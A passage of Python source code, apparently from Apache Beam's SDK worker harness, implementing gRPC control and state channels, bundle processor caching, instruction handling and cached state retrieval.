# time-based data buffering is disabled by default
data_buffer_time_limit_ms=0, # type: int
profiler_factory=None, # type: Optional[Callable[..., Profile]]
status_address=None, # type: Optional[str]
# Heap dump through status api is disabled by default
enable_heap_dump=False, # type: bool
):
# type: (...) -> None
self._alive = True
self._worker_index = 0
self._worker_id = worker_id
self._state_cache = StateCache(state_cache_size)
options = [('grpc.max_receive_message_length', -1),
('grpc.max_send_message_length', -1)]
if credentials is None:
_LOGGER.info('Creating insecure control channel for %s.', control_address)
self._control_channel = GRPCChannelFactory.insecure_channel(
control_address, options=options)
else:
_LOGGER.info('Creating secure control channel for %s.', control_address)
self._control_channel = GRPCChannelFactory.secure_channel(
control_address, credentials, options=options)
grpc.channel_ready_future(self._control_channel).result(timeout=60)
_LOGGER.info('Control channel established.')
self._control_channel = grpc.intercept_channel(
self._control_channel, WorkerIdInterceptor(self._worker_id))
self._data_channel_factory = data_plane.GrpcClientDataChannelFactory(
credentials, self._worker_id, data_buffer_time_limit_ms)
self._state_handler_factory = GrpcStateHandlerFactory(
self._state_cache, credentials)
self._profiler_factory = profiler_factory
def default_factory(id):
# type: (str) -> beam_fn_api_pb2.ProcessBundleDescriptor
return self._control_stub.GetProcessBundleDescriptor(
beam_fn_api_pb2.GetProcessBundleDescriptorRequest(
process_bundle_descriptor_id=id))
self._fns = KeyedDefaultDict(default_factory)
# BundleProcessor cache across all workers.
self._bundle_processor_cache = BundleProcessorCache(
state_handler_factory=self._state_handler_factory,
data_channel_factory=self._data_channel_factory,
fns=self._fns)
if status_address:
try:
self._status_handler = FnApiWorkerStatusHandler(
status_address, self._bundle_processor_cache,
enable_heap_dump) # type: Optional[FnApiWorkerStatusHandler]
except Exception:
traceback_string = traceback.format_exc()
_LOGGER.warning(
'Error creating worker status request handler, '
'skipping status report. Trace back: %s' % traceback_string)
else:
self._status_handler = None
# TODO(BEAM-8998) use common
# thread_pool_executor.shared_unbounded_instance() to process bundle
# progress once dataflow runner's excessive progress polling is removed.
self._report_progress_executor = futures.ThreadPoolExecutor(max_workers=1)
self._worker_thread_pool = thread_pool_executor.shared_unbounded_instance()
self._responses = queue.Queue(
) # type: queue.Queue[Union[beam_fn_api_pb2.InstructionResponse, Sentinel]]
_LOGGER.info('Initializing SDKHarness with unbounded number of workers.')
def run(self):
# type: () -> None
self._control_stub = beam_fn_api_pb2_grpc.BeamFnControlStub(
self._control_channel)
no_more_work = Sentinel.sentinel
def get_responses():
# type: () -> Iterator[beam_fn_api_pb2.InstructionResponse]
while True:
response = self._responses.get()
if response is no_more_work:
return
yield response
self._alive = True
try:
for work_request in self._control_stub.Control(get_responses()):
_LOGGER.debug('Got work %s', work_request.instruction_id)
request_type = work_request.WhichOneof('request')
# Name spacing the request method with 'request_'. The called method
# will be like self.request_register(request)
getattr(self, SdkHarness.REQUEST_METHOD_PREFIX + request_type)(
work_request)
finally:
self._alive = False
_LOGGER.info('No more requests from control plane')
_LOGGER.info('SDK Harness waiting for in-flight requests to complete')
# Wait until existing requests are processed.
self._worker_thread_pool.shutdown()
# get_responses may be blocked on responses.get(), but we need to return
# control to its caller.
self._responses.put(no_more_work)
# Stop all the workers and clean all the associated resources
self._data_channel_factory.close()
self._state_handler_factory.close()
self._bundle_processor_cache.shutdown()
if self._status_handler:
self._status_handler.close()
_LOGGER.info('Done consuming work.')
def _execute(
self,
task, # type: Callable[[], beam_fn_api_pb2.InstructionResponse]
request # type: beam_fn_api_pb2.InstructionRequest
):
# type: (...) -> None
with statesampler.instruction_id(request.instruction_id):
try:
response = task()
except Exception: # pylint: disable=broad-except
traceback_string = traceback.format_exc()
print(traceback_string, file=sys.stderr)
_LOGGER.error(
'Error processing instruction %s. Original traceback is\n%s\n',
request.instruction_id,
traceback_string)
response = beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id, error=traceback_string)
self._responses.put(response)
def _request_register(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
# registration request is handled synchronously
self._execute(lambda: self.create_worker().do_instruction(request), request)
def _request_process_bundle(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
self._bundle_processor_cache.activate(request.instruction_id)
self._request_execute(request)
def _request_process_bundle_split(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
self._request_process_bundle_action(request)
def _request_process_bundle_progress(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
self._request_process_bundle_action(request)
def _request_process_bundle_action(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
def task():
# type: () -> None
self._execute(
lambda: self.create_worker().do_instruction(request), request)
self._report_progress_executor.submit(task)
def _request_finalize_bundle(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
self._request_execute(request)
def _request_harness_monitoring_infos(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
process_wide_monitoring_infos = MetricsEnvironment.process_wide_container(
).to_runner_api_monitoring_infos(None).values()
self._execute(
lambda: beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id,
harness_monitoring_infos=(
beam_fn_api_pb2.HarnessMonitoringInfosResponse(
monitoring_data={
SHORT_ID_CACHE.get_short_id(info): info.payload
for info in process_wide_monitoring_infos
}))),
request)
def _request_monitoring_infos(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
self._execute(
lambda: beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id,
monitoring_infos=beam_fn_api_pb2.MonitoringInfosMetadataResponse(
monitoring_info=SHORT_ID_CACHE.get_infos(
request.monitoring_infos.monitoring_info_id))),
request)
def _request_execute(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> None
def task():
# type: () -> None
self._execute(
lambda: self.create_worker().do_instruction(request), request)
self._worker_thread_pool.submit(task)
_LOGGER.debug(
"Currently using %s threads." % len(self._worker_thread_pool._workers))
def create_worker(self):
# type: () -> SdkWorker
return SdkWorker(
self._bundle_processor_cache,
state_cache_metrics_fn=self._state_cache.get_monitoring_infos,
profiler_factory=self._profiler_factory)
class BundleProcessorCache(object):
"""A cache for ``BundleProcessor``s.
``BundleProcessor`` objects are cached by the id of their
``beam_fn_api_pb2.ProcessBundleDescriptor``.
Attributes:
fns (dict): A dictionary that maps bundle descriptor IDs to instances of
``beam_fn_api_pb2.ProcessBundleDescriptor``.
state_handler_factory (``StateHandlerFactory``): Used to create state
handlers to be used by a ``bundle_processor.BundleProcessor`` during
processing.
data_channel_factory (``data_plane.DataChannelFactory``)
active_bundle_processors (dict): A dictionary, indexed by instruction IDs,
containing ``bundle_processor.BundleProcessor`` objects that are currently
active processing the corresponding instruction.
cached_bundle_processors (dict): A dictionary, indexed by bundle processor
id, of cached ``bundle_processor.BundleProcessor`` that are not currently
performing processing.
"""
periodic_shutdown = None # type: Optional[PeriodicThread]
def __init__(
self,
state_handler_factory, # type: StateHandlerFactory
data_channel_factory, # type: data_plane.DataChannelFactory
fns # type: MutableMapping[str, beam_fn_api_pb2.ProcessBundleDescriptor]
):
# type: (...) -> None
self.fns = fns
self.state_handler_factory = state_handler_factory
self.data_channel_factory = data_channel_factory
self.known_not_running_instruction_ids = collections.OrderedDict(
) # type: collections.OrderedDict[str, bool]
self.failed_instruction_ids = collections.OrderedDict(
) # type: collections.OrderedDict[str, bool]
self.active_bundle_processors = {
} # type: Dict[str, Tuple[str, bundle_processor.BundleProcessor]]
self.cached_bundle_processors = collections.defaultdict(
list) # type: DefaultDict[str, List[bundle_processor.BundleProcessor]]
self.last_access_times = collections.defaultdict(
float) # type: DefaultDict[str, float]
self._schedule_periodic_shutdown()
self._lock = threading.Lock()
def register(self, bundle_descriptor):
# type: (beam_fn_api_pb2.ProcessBundleDescriptor) -> None
"""Register a ``beam_fn_api_pb2.ProcessBundleDescriptor`` by its id."""
self.fns[bundle_descriptor.id] = bundle_descriptor
def activate(self, instruction_id):
# type: (str) -> None
"""Makes the ``instruction_id`` known to the bundle processor.
Allows ``lookup`` to return ``None``. Necessary if ``lookup`` can occur
before ``get``.
"""
with self._lock:
self.known_not_running_instruction_ids[instruction_id] = True
def get(self, instruction_id, bundle_descriptor_id):
# type: (str, str) -> bundle_processor.BundleProcessor
"""
Return the requested ``BundleProcessor``, creating it if necessary.
Moves the ``BundleProcessor`` from the inactive to the active cache.
"""
with self._lock:
try:
# pop() is threadsafe
processor = self.cached_bundle_processors[bundle_descriptor_id].pop()
self.active_bundle_processors[
instruction_id] = bundle_descriptor_id, processor
try:
del self.known_not_running_instruction_ids[instruction_id]
except KeyError:
# The instruction may have not been pre-registered before execution
# since activate() may have never been invoked
pass
return processor
except IndexError:
pass
# Make sure we instantiate the processor while not holding the lock.
processor = bundle_processor.BundleProcessor(
self.fns[bundle_descriptor_id],
self.state_handler_factory.create_state_handler(
self.fns[bundle_descriptor_id].state_api_service_descriptor),
self.data_channel_factory)
with self._lock:
self.active_bundle_processors[
instruction_id] = bundle_descriptor_id, processor
try:
del self.known_not_running_instruction_ids[instruction_id]
except KeyError:
# The instruction may have not been pre-registered before execution
# since activate() may have never been invoked
pass
return processor
def lookup(self, instruction_id):
# type: (str) -> Optional[bundle_processor.BundleProcessor]
"""
Return the requested ``BundleProcessor`` from the cache.
Will return ``None`` if the BundleProcessor is known but not yet ready. Will
raise an error if the ``instruction_id`` is not known or has been discarded.
"""
with self._lock:
if instruction_id in self.failed_instruction_ids:
raise RuntimeError(
'Bundle processing associated with %s has failed. '
'Check prior failing response for details.' % instruction_id)
processor = self.active_bundle_processors.get(
instruction_id, (None, None))[-1]
if processor:
return processor
if instruction_id in self.known_not_running_instruction_ids:
return None
raise RuntimeError('Unknown process bundle id %s.' % instruction_id)
def discard(self, instruction_id):
# type: (str) -> None
"""
Marks the instruction id as failed shutting down the ``BundleProcessor``.
"""
with self._lock:
self.failed_instruction_ids[instruction_id] = True
while len(self.failed_instruction_ids) > MAX_FAILED_INSTRUCTIONS:
self.failed_instruction_ids.popitem(last=False)
processor = self.active_bundle_processors[instruction_id][1]
del self.active_bundle_processors[instruction_id]
# Perform the shutdown while not holding the lock.
processor.shutdown()
def release(self, instruction_id):
# type: (str) -> None
"""
Release the requested ``BundleProcessor``.
Resets the ``BundleProcessor`` and moves it from the active to the
inactive cache.
"""
with self._lock:
self.known_not_running_instruction_ids[instruction_id] = True
while len(self.known_not_running_instruction_ids
) > MAX_KNOWN_NOT_RUNNING_INSTRUCTIONS:
self.known_not_running_instruction_ids.popitem(last=False)
descriptor_id, processor = (
self.active_bundle_processors.pop(instruction_id))
# Make sure that we reset the processor while not holding the lock.
processor.reset()
with self._lock:
self.last_access_times[descriptor_id] = time.time()
self.cached_bundle_processors[descriptor_id].append(processor)
def shutdown(self):
# type: () -> None
"""
Shutdown all ``BundleProcessor``s in the cache.
"""
if self.periodic_shutdown:
self.periodic_shutdown.cancel()
self.periodic_shutdown.join()
self.periodic_shutdown = None
for instruction_id in list(self.active_bundle_processors.keys()):
self.discard(instruction_id)
for cached_bundle_processors in self.cached_bundle_processors.values():
BundleProcessorCache._shutdown_cached_bundle_processors(
cached_bundle_processors)
def _schedule_periodic_shutdown(self):
# type: () -> None
def shutdown_inactive_bundle_processors():
# type: () -> None
for descriptor_id, last_access_time in self.last_access_times.items():
if (time.time() - last_access_time >
DEFAULT_BUNDLE_PROCESSOR_CACHE_SHUTDOWN_THRESHOLD_S):
BundleProcessorCache._shutdown_cached_bundle_processors(
self.cached_bundle_processors[descriptor_id])
self.periodic_shutdown = PeriodicThread(
DEFAULT_BUNDLE_PROCESSOR_CACHE_SHUTDOWN_THRESHOLD_S,
shutdown_inactive_bundle_processors)
self.periodic_shutdown.daemon = True
self.periodic_shutdown.start()
@staticmethod
def _shutdown_cached_bundle_processors(cached_bundle_processors):
# type: (List[bundle_processor.BundleProcessor]) -> None
try:
while True:
# pop() is threadsafe
bundle_processor = cached_bundle_processors.pop()
bundle_processor.shutdown()
except IndexError:
pass
class SdkWorker(object):
def __init__(
self,
bundle_processor_cache, # type: BundleProcessorCache
state_cache_metrics_fn=list, # type: Callable[[], Iterable[metrics_pb2.MonitoringInfo]]
profiler_factory=None, # type: Optional[Callable[..., Profile]]
):
# type: (...) -> None
self.bundle_processor_cache = bundle_processor_cache
self.state_cache_metrics_fn = state_cache_metrics_fn
self.profiler_factory = profiler_factory
def do_instruction(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> beam_fn_api_pb2.InstructionResponse
request_type = request.WhichOneof('request')
if request_type:
# E.g. if register is set, this will call self.register(request.register))
return getattr(self, request_type)(
getattr(request, request_type), request.instruction_id)
else:
raise NotImplementedError
def register(
self,
request, # type: beam_fn_api_pb2.RegisterRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
"""Registers a set of ``beam_fn_api_pb2.ProcessBundleDescriptor``s.
This set of ``beam_fn_api_pb2.ProcessBundleDescriptor`` come as part of a
``beam_fn_api_pb2.RegisterRequest``, which the runner sends to the SDK
worker before starting processing to register stages.
"""
for process_bundle_descriptor in request.process_bundle_descriptor:
self.bundle_processor_cache.register(process_bundle_descriptor)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
register=beam_fn_api_pb2.RegisterResponse())
def process_bundle(
self,
request, # type: beam_fn_api_pb2.ProcessBundleRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
bundle_processor = self.bundle_processor_cache.get(
instruction_id, request.process_bundle_descriptor_id)
try:
with bundle_processor.state_handler.process_instruction_id(
instruction_id, request.cache_tokens):
with self.maybe_profile(instruction_id):
delayed_applications, requests_finalization = (
bundle_processor.process_bundle(instruction_id))
monitoring_infos = bundle_processor.monitoring_infos()
monitoring_infos.extend(self.state_cache_metrics_fn())
response = beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
residual_roots=delayed_applications,
monitoring_infos=monitoring_infos,
monitoring_data={
SHORT_ID_CACHE.get_short_id(info): info.payload
for info in monitoring_infos
},
requires_finalization=requests_finalization))
# Don't release here if finalize is needed.
if not requests_finalization:
self.bundle_processor_cache.release(instruction_id)
return response
except: # pylint: disable=broad-except
# Don't re-use bundle processors on failure.
self.bundle_processor_cache.discard(instruction_id)
raise
def process_bundle_split(
self,
request, # type: beam_fn_api_pb2.ProcessBundleSplitRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
try:
processor = self.bundle_processor_cache.lookup(request.instruction_id)
except RuntimeError:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id, error=traceback.format_exc())
# Return an empty response if we aren't running. This can happen
# if the ProcessBundleRequest has not started or already finished.
process_bundle_split = (
processor.try_split(request)
if processor else beam_fn_api_pb2.ProcessBundleSplitResponse())
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_split=process_bundle_split)
def process_bundle_progress(
self,
request, # type: beam_fn_api_pb2.ProcessBundleProgressRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
try:
processor = self.bundle_processor_cache.lookup(request.instruction_id)
except RuntimeError:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id, error=traceback.format_exc())
if processor:
monitoring_infos = processor.monitoring_infos()
else:
# Return an empty response if we aren't running. This can happen
# if the ProcessBundleRequest has not started or already finished.
monitoring_infos = []
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_progress=beam_fn_api_pb2.ProcessBundleProgressResponse(
monitoring_infos=monitoring_infos,
monitoring_data={
SHORT_ID_CACHE.get_short_id(info): info.payload
for info in monitoring_infos
}))
def finalize_bundle(
self,
request, # type: beam_fn_api_pb2.FinalizeBundleRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
try:
processor = self.bundle_processor_cache.lookup(request.instruction_id)
except RuntimeError:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id, error=traceback.format_exc())
if processor:
try:
finalize_response = processor.finalize_bundle()
self.bundle_processor_cache.release(request.instruction_id)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id, finalize_bundle=finalize_response)
except:
self.bundle_processor_cache.discard(request.instruction_id)
raise
# We can reach this state if there was an erroneous request to finalize
# the bundle while it is being initialized or has already been finalized
# and released.
raise RuntimeError(
'Bundle is not in a finalizable state for %s' % instruction_id)
@contextlib.contextmanager
def maybe_profile(self, instruction_id):
# type: (str) -> Iterator[None]
if self.profiler_factory:
profiler = self.profiler_factory(instruction_id)
if profiler:
with profiler:
yield
else:
yield
else:
yield
class StateHandler(metaclass=abc.ABCMeta):
"""An abstract object representing a ``StateHandler``."""
@abc.abstractmethod
def get_raw(
self,
state_key, # type: beam_fn_api_pb2.StateKey
continuation_token=None # type: Optional[bytes]
):
# type: (...) -> Tuple[bytes, Optional[bytes]]
raise NotImplementedError(type(self))
@abc.abstractmethod
def append_raw(
self,
state_key, # type: beam_fn_api_pb2.StateKey
data # type: bytes
):
# type: (...) -> _Future
raise NotImplementedError(type(self))
@abc.abstractmethod
def clear(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> _Future
raise NotImplementedError(type(self))
@abc.abstractmethod
@contextlib.contextmanager
def process_instruction_id(self, bundle_id):
# type: (str) -> Iterator[None]
raise NotImplementedError(type(self))
@abc.abstractmethod
def done(self):
# type: () -> None
raise NotImplementedError(type(self))
class StateHandlerFactory(metaclass=abc.ABCMeta):
"""An abstract factory for creating ``DataChannel``."""
@abc.abstractmethod
def create_state_handler(self, api_service_descriptor):
# type: (endpoints_pb2.ApiServiceDescriptor) -> CachingStateHandler
"""Returns a ``StateHandler`` from the given ApiServiceDescriptor."""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
# type: () -> None
"""Close all channels that this factory owns."""
raise NotImplementedError(type(self))
class GrpcStateHandlerFactory(StateHandlerFactory):
"""A factory for ``GrpcStateHandler``.
Caches the created channels by ``state descriptor url``.
"""
def __init__(self, state_cache, credentials=None):
# type: (StateCache, Optional[grpc.ChannelCredentials]) -> None
self._state_handler_cache = {} # type: Dict[str, CachingStateHandler]
self._lock = threading.Lock()
self._throwing_state_handler = ThrowingStateHandler()
self._credentials = credentials
self._state_cache = state_cache
def create_state_handler(self, api_service_descriptor):
# type: (endpoints_pb2.ApiServiceDescriptor) -> CachingStateHandler
if not api_service_descriptor:
return self._throwing_state_handler
url = api_service_descriptor.url
if url not in self._state_handler_cache:
with self._lock:
if url not in self._state_handler_cache:
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size is
# controlled in a layer above.
options = [('grpc.max_receive_message_length', -1),
('grpc.max_send_message_length', -1)]
if self._credentials is None:
_LOGGER.info('Creating insecure state channel for %s.', url)
grpc_channel = GRPCChannelFactory.insecure_channel(
url, options=options)
else:
_LOGGER.info('Creating secure state channel for %s.', url)
grpc_channel = GRPCChannelFactory.secure_channel(
url, self._credentials, options=options)
_LOGGER.info('State channel established.')
# Add workerId to the grpc channel
grpc_channel = grpc.intercept_channel(
grpc_channel, WorkerIdInterceptor())
self._state_handler_cache[url] = GlobalCachingStateHandler(
self._state_cache,
GrpcStateHandler(
beam_fn_api_pb2_grpc.BeamFnStateStub(grpc_channel)))
return self._state_handler_cache[url]
def close(self):
# type: () -> None
_LOGGER.info('Closing all cached gRPC state handlers.')
for _, state_handler in self._state_handler_cache.items():
state_handler.done()
self._state_handler_cache.clear()
self._state_cache.evict_all()
class CachingStateHandler(metaclass=abc.ABCMeta):
@abc.abstractmethod
@contextlib.contextmanager
def process_instruction_id(self, bundle_id, cache_tokens):
# type: (str, Iterable[beam_fn_api_pb2.ProcessBundleRequest.CacheToken]) -> Iterator[None]
raise NotImplementedError(type(self))
@abc.abstractmethod
def blocking_get(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
):
# type: (...) -> Iterable[Any]
raise NotImplementedError(type(self))
@abc.abstractmethod
def extend(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
elements, # type: Iterable[Any]
):
# type: (...) -> _Future
raise NotImplementedError(type(self))
@abc.abstractmethod
def clear(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> _Future
raise NotImplementedError(type(self))
@abc.abstractmethod
def done(self):
# type: () -> None
raise NotImplementedError(type(self))
class ThrowingStateHandler(CachingStateHandler):
"""A caching state handler that errors on any requests."""
@contextlib.contextmanager
def process_instruction_id(self, bundle_id, cache_tokens):
# type: (str, Iterable[beam_fn_api_pb2.ProcessBundleRequest.CacheToken]) -> Iterator[None]
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor '
'for bundle id %s.' % bundle_id)
def blocking_get(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
):
# type: (...) -> Iterable[Any]
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'state ApiServiceDescriptor for state key %s.' % state_key)
def extend(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
elements, # type: Iterable[Any]
):
# type: (...) -> _Future
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'state ApiServiceDescriptor for state key %s.' % state_key)
def clear(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> _Future
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'state ApiServiceDescriptor for state key %s.' % state_key)
def done(self):
# type: () -> None
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor.')
class GrpcStateHandler(StateHandler):
_DONE = Sentinel.sentinel
def __init__(self, state_stub):
# type: (beam_fn_api_pb2_grpc.BeamFnStateStub) -> None
self._lock = threading.Lock()
self._state_stub = state_stub
self._requests = queue.Queue(
) # type: queue.Queue[Union[beam_fn_api_pb2.StateRequest, Sentinel]]
self._responses_by_id = {} # type: Dict[str, _Future]
self._last_id = 0
self._exception = None # type: Optional[Exception]
self._context = threading.local()
self.start()
@contextlib.contextmanager
def process_instruction_id(self, bundle_id):
# type: (str) -> Iterator[None]
if getattr(self._context, 'process_instruction_id', None) is not None:
raise RuntimeError(
'Already bound to %r' % self._context.process_instruction_id)
self._context.process_instruction_id = bundle_id
try:
yield
finally:
self._context.process_instruction_id = None
def start(self):
# type: () -> None
self._done = False
def request_iter():
# type: () -> Iterator[beam_fn_api_pb2.StateRequest]
while True:
request = self._requests.get()
if request is self._DONE or self._done:
break
yield request
responses = self._state_stub.State(request_iter())
def pull_responses():
# type: () -> None
try:
for response in responses:
# Popping an item from a dictionary is atomic in cPython
future = self._responses_by_id.pop(response.id)
future.set(response)
if self._done:
break
except Exception as e:
self._exception = e
raise
reader = threading.Thread(target=pull_responses, name='read_state')
reader.daemon = True
reader.start()
def done(self):
# type: () -> None
self._done = True
self._requests.put(self._DONE)
def get_raw(
self,
state_key, # type: beam_fn_api_pb2.StateKey
continuation_token=None # type: Optional[bytes]
):
# type: (...) -> Tuple[bytes, Optional[bytes]]
response = self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
get=beam_fn_api_pb2.StateGetRequest(
continuation_token=continuation_token)))
return response.get.data, response.get.continuation_token
def append_raw(
self,
state_key, # type: Optional[beam_fn_api_pb2.StateKey]
data # type: bytes
):
# type: (...) -> _Future
return self._request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
append=beam_fn_api_pb2.StateAppendRequest(data=data)))
def clear(self, state_key):
# type: (Optional[beam_fn_api_pb2.StateKey]) -> _Future
return self._request(
beam_fn_api_pb2.StateRequest(
state_key=state_key, clear=beam_fn_api_pb2.StateClearRequest()))
def _request(self, request):
# type: (beam_fn_api_pb2.StateRequest) -> _Future[beam_fn_api_pb2.StateResponse]
request.id = self._next_id()
request.instruction_id = self._context.process_instruction_id
# Adding a new item to a dictionary is atomic in cPython
self._responses_by_id[request.id] = future = _Future[
beam_fn_api_pb2.StateResponse]()
# Request queue is thread-safe
self._requests.put(request)
return future
def _blocking_request(self, request):
# type: (beam_fn_api_pb2.StateRequest) -> beam_fn_api_pb2.StateResponse
req_future = self._request(request)
while not req_future.wait(timeout=1):
if self._exception:
raise self._exception
elif self._done:
raise RuntimeError()
response = req_future.get()
if response.error:
raise RuntimeError(response.error)
else:
return response
def _next_id(self):
# type: () -> str
with self._lock:
# Use a lock here because this GrpcStateHandler is shared across all
# requests which have the same process bundle descriptor. State requests
# can concurrently access this section if a Runner uses threads / workers
# (aka "parallelism") to send data to this SdkHarness and its workers.
self._last_id += 1
request_id = self._last_id
return str(request_id)
class GlobalCachingStateHandler(CachingStateHandler):
""" A State handler which retrieves and caches state.
If caching is activated, caches across bundles using a supplied cache token.
If activated but no cache token is supplied, caching is done at the bundle
level.
"""
def __init__(
self,
global_state_cache, # type: StateCache
underlying_state # type: StateHandler
):
# type: (...) -> None
self._underlying = underlying_state
self._state_cache = global_state_cache
self._context = threading.local()
@contextlib.contextmanager
def process_instruction_id(self, bundle_id, cache_tokens):
# type: (str, Iterable[beam_fn_api_pb2.ProcessBundleRequest.CacheToken]) -> Iterator[None]
if getattr(self._context, 'user_state_cache_token', None) is not None:
raise RuntimeError(
'Cache tokens already set to %s' %
self._context.user_state_cache_token)
self._context.side_input_cache_tokens = {}
user_state_cache_token = None
for cache_token_struct in cache_tokens:
if cache_token_struct.HasField("user_state"):
# There should only be one user state token present
assert not user_state_cache_token
user_state_cache_token = cache_token_struct.token
elif cache_token_struct.HasField("side_input"):
self._context.side_input_cache_tokens[
cache_token_struct.side_input.transform_id,
cache_token_struct.side_input.
side_input_id] = cache_token_struct.token
# TODO: Consider a two-level cache to avoid extra logic and locking
# for items cached at the bundle level.
self._context.bundle_cache_token = bundle_id
try:
self._state_cache.initialize_metrics()
self._context.user_state_cache_token = user_state_cache_token
with self._underlying.process_instruction_id(bundle_id):
yield
finally:
self._context.side_input_cache_tokens = {}
self._context.user_state_cache_token = None
self._context.bundle_cache_token = None
def blocking_get(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
):
# type: (...) -> Iterable[Any]
cache_token = self._get_cache_token(state_key)
if not cache_token:
# Cache disabled / no cache token. Can't do a lookup/store in the cache.
# Fall back to lazily materializing the state, one element at a time.
return self._lazy_iterator(state_key, coder)
# Cache lookup
cache_state_key = self._convert_to_cache_key(state_key)
cached_value = self._state_cache.get(cache_state_key, cache_token)
if cached_value is None:
# Cache miss, need to retrieve from the Runner
# Further size estimation or the use of the continuation token on the
# runner side could fall back to materializing one item at a time.
# https://jira.apache.org/jira/browse/BEAM-8297
materialized = cached_value = (
self._partially_cached_iterable(state_key, coder))
if isinstance(materialized, (list, self.ContinuationIterable)):
self._state_cache.put(cache_state_key, cache_token, materialized)
else:
_LOGGER.error(
"Uncacheable type %s for key %s. Not caching.",
materialized,
state_key)
return cached_value
def extend(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
elements, # type: Iterable[Any]
):
# type: (...) -> _Future
cache_token = self._get_cache_token(state_key)
if cache_token:
# Update the cache
cache_key = self._convert_to_cache_key(state_key)
cached_value = self._state_cache.get(cache_key, cache_token)
# Keep in mind that the state for this key can be evicted
# while executing this function. Either read or write to the cache
# but never do both here!
if cached_value is None:
# We have never cached this key before, first retrieve state
cached_value = self.blocking_get(state_key, coder)
# Just extend the already cached value
if isinstance(cached_value, list):
# Materialize provided iterable to ensure reproducible iterations,
# here and when writing to the state handler below.
elements = list(elements)
# The state is fully cached and can be extended
cached_value.extend(elements)
elif isinstance(cached_value, self.ContinuationIterable):
# The state is too large to be fully cached (continuation token used),
# only the first part is cached, the rest if enumerated via the runner.
pass
else:
# When a corrupt value made it into the cache, we have to fail.
raise Exception("Unexpected cached value: %s" % cached_value)
# Write to state handler
out = coder_impl.create_OutputStream()
for element in elements:
coder.encode_to_stream(element, out, True)
return self._underlying.append_raw(state_key, out.get())
def clear(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> _Future
cache_token = self._get_cache_token(state_key)
if cache_token:
cache_key = self._convert_to_cache_key(state_key)
self._state_cache.clear(cache_key, cache_token)
return self._underlying.clear(state_key)
def done(self):
# type: () -> None
self._underlying.done()
def _lazy_iterator(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
continuation_token=None # type: Optional[bytes]
):
# type: (...) -> Iterator[Any]
"""Materializes the state lazily, one element at a time.
:return A generator which returns the next element if advanced.
"""
while True:
data, continuation_token = (
self._underlying.get_raw(state_key, continuation_token))
input_stream = coder_impl.create_InputStream(data)
while input_stream.size() > 0:
yield coder.decode_from_stream(input_stream, True)
if not continuation_token:
break
def _get_cache_token(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> Optional[bytes]
if not self._state_cache.is_cache_enabled():
return None
elif state_key.HasField('bag_user_state'):
if self._context.user_state_cache_token:
return self._context.user_state_cache_token
else:
return self._context.bundle_cache_token
elif state_key.WhichOneof('type').endswith('_side_input'):
side_input = getattr(state_key, state_key.WhichOneof('type'))
return self._context.side_input_cache_tokens.get(
(side_input.transform_id, side_input.side_input_id),
self._context.bundle_cache_token)
return None
def _partially_cached_iterable(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder # type: coder_impl.CoderImpl
):
# type: (...) -> Iterable[Any]
"""Materialized the first page of data, concatenated with a lazy iterable
of the rest, if any.
"""
data, continuation_token = self._underlying.get_raw(state_key, None)
head = []
input_stream = coder_impl.create_InputStream(data)
while input_stream.size() > 0:
head.append(coder.decode_from_stream(input_stream, True))
if not continuation_token:
return head
else:
return self.ContinuationIterable(
head,
functools.partial(
self._lazy_iterator, state_key, coder, continuation_token))
class ContinuationIterable(Generic[T]):
def __init__(self, head, continue_iterator_fn):
